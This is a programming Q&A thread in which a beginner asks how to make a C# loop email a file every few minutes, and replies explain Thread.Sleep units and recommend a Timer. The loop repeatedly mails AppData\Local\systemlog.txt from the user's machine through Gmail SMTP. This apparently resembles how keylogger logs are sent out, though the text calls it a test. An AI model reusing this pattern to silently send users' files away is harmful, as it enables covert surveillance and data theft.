# While(true) Thread.Sleep(); doesnt work how to sleep?

Tags: c#, email, while-loop, gmail, sleep

```
            while (true)
            {
                Thread.Sleep(1);
                MailMessage mail = new MailMessage();
                SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com");

                mail.From = new MailAddress("");
                mail.To.Add("");
                mail.Subject = "Test Mail";
                mail.Attachments.Add(new Attachment(@"C:\Users\" + Environment.UserName + @"\AppData\Local\systemlog.txt"));
                mail.Body = "This is for testing SMTP mail from GMAIL";


                SmtpServer.Port = 587;
                SmtpServer.Credentials = new System.Net.NetworkCredential("", "");
                SmtpServer.EnableSsl = true;
                SmtpServer.Send(mail);



                Application.DoEvents();


            }
```

Hey i want that the email were sendet every 10 minutes or 1 minute but Thread.Sleep(1); doesnt work i need help please thanks (;

Comment: `600000` == 1 minute. The argument for `Sleep` is in milliseconds..

Comment: Thread.Sleep(int millisecondsTimeout) expects the number of milliseconds to sleep. You are just making it sleep for 1 ms. You should actually use like Thread.Sleep(600000);

Comment: Okay Thank you but i found an better method:

DateTime LastSend = System.DateTime.Now;
                if (LastSend.AddMinutes(20) > System.DateTime.Now)
                    continue;
//process here
LastSend = System.DateTime.Now;

Comment: Also, you should'nt be sleeping the thread, this will block everything when you do this.

Comment: I suggest you check out [Timer](https://learn.microsoft.com/en-us/dotnet/api/system.timers.timer?view=netframework-4.8).

Comment: `Application.DoEvents();` - **Every** time you find yourself in need of using this: Ask yourself "Really?" !

Comment: @Yariya Your "better method" is a well-known **anti-pattern**.

Comment: Chill i am an beginner

Comment: @Yariya Even a beginner should know not to do an busy loop...

Answer (score 0):

Your (major) error: [Thread.Sleep(Int32)](https://learn.microsoft.com/en-us/dotnet/api/system.threading.thread.sleep?view=netframework-4.8#System_Threading_Thread_Sleep_System_Int32_) expects a value in Milliseconds!

It has an [overload](https://learn.microsoft.com/en-us/dotnet/api/system.threading.thread.sleep?view=netframework-4.8#System_Threading_Thread_Sleep_System_TimeSpan_) that takes a [TimeSpan](https://learn.microsoft.com/en-us/dotnet/api/system.timespan?view=netframework-4.8) which I highly recommend using, due to its readability.

But for your Task at hand, ...

I suggest you give it a shot with [Timer](https://learn.microsoft.com/en-us/dotnet/api/system.timers.timer?view=netframework-4.8):

```
class MailTimer
{
     private System.Timers.Timer _Timer = null;

     public void StartTimer( TimeSpan period ) // Pass your period as TimeSpan
                                               // e.g. TimeSpan.FromMinutes(10)
     {
          if( _Timer != null ) throw new InvalidOperationException("Mail Timer already started!");
          _Timer = new System.Timers.Timer(period.TotalMilliseconds);
          _Timer.Elapsed += OnTimedEvent;
          _Timer.AutoReset = true;
          _Timer.Enabled = true;
     }

     public void StopMailing()
     {
         if( _Timer == null ) return;
         _Timer.Stop();
         _Timer.Dispose();
         _Timer = null;
     }

     private static void OnTimedEvent(Object source, ElapsedEventArgs e)
     {
         TrySendMail(); // Do your Mail-Magic
     }
}
```

Mind: this is far from thread safe. Please also do not just copy & paste. You *will* need to make adjustments and take precautions according to your requirements.